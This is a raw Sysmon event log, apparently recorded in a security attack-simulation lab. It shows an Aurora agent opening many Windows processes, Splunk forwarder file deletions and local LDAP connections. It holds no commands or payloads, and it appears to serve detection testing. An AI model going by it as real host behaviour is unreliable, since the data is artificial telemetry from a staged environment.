Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046466Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:54.778{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046465Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:54.778{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046464Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:54.772{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046463Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:54.761{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046462Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:54.739{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046461Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:54.733{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046460Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:54.724{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046459Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:54.720{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046458Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:54.718{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046457Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:54.716{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046456Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:54.713{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046455Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:54.711{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046454Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:54.710{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046453Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:54.707{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046452Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:54.706{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046451Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:54.705{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046450Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:54.704{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046449Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:54.702{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 23542300x800000000000000046448Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:54.278{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A80E884870683A7244172F8DBA8C334,SHA256=8149FE225386F75776A6B131FAD3D894823C8ADC9F5F1EC2216DFBB2EE5378E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000046447Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:54.194{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046446Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:54.193{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046445Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:54.192{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-F104-00000000AF02}6068C:\Program Files\Aurora-Agent\aurora-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000018668Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:55.948{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAAB4726ADE8FC6713FE35FDAAFC9D9B,SHA256=C8872E02C331712D035FFAE1DA5CF8B732748902B1FA04A35F2123FD5592044A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046471Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:55.356{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6031638E6A5124DC4E110ED5082ADA69,SHA256=4E0B079B0964F777D7F4455836058F5D5B4528A56FA5A223002C2FF189C0CEC7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000046475Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:54.376{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56469-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000046474Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:54.376{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56469-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local389ldap 23542300x800000000000000046473Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:56.440{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECDED04A3C81C440BA73A7930D99D491,SHA256=F2C98FFC9A5F45AC530DDD25DE0AE37FAA7A4099659FAFE1A59486CADF8F790A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000046472Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:56.022{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AF09D51F6117C00B36071B2D3B8888B9,SHA256=484B99E4847F2A463E527BA681FCC8129A77755F8410EC760698C9F14D0C936C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000046477Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:55.722{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56470-false10.0.1.12-8000- 23542300x800000000000000046476Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:57.540{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=816252A9C00FE95EB5B41FEBF7EDA59B,SHA256=76B6CD86EA4CC3D894DB37D89D48A97249BBAE49396D5AD80C2DC8A3D2479ACB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018669Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:57.051{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC9B14CE18A3B706B23E4E4BAD372127,SHA256=6851017A64859D23E9E0EB8DFD3EDB38081C6AA0C10A974EC3DC789B643BB55B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046479Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:58.644{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C88285D2CC2824F3E32D44203CBF4FC4,SHA256=03C129FCEA530D6C1C05218764635871F446E95BFB043CFE66D019C5919A0075,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000018671Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:56.956{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50189-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000018670Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:58.120{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=718621DEA45A155FD4827D2299D4CCFC,SHA256=82621D9DB83BA949268CFEAE75A3E912C35C1EAC13C7EF047CAE10E9641E226F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046478Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:58.395{FE4C2B44-DA03-63C7-2400-00000000AF02}2492NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-08771daebc39497be\channels\health\respondent-20230118113741-050MD5=F3A77350075DBB208FEC17E5163EBA2F,SHA256=8E104D4FA3B2A2E0F7792F9479E83164AF9BF75506FCB23760AA4A41EC5F846D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000046482Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:59.807{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=4B008FD402075D83CF22093606A08501,SHA256=DB109F7AA5525ECA0119D3591F8CB086E66596E5B71571F528780A51C165626B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 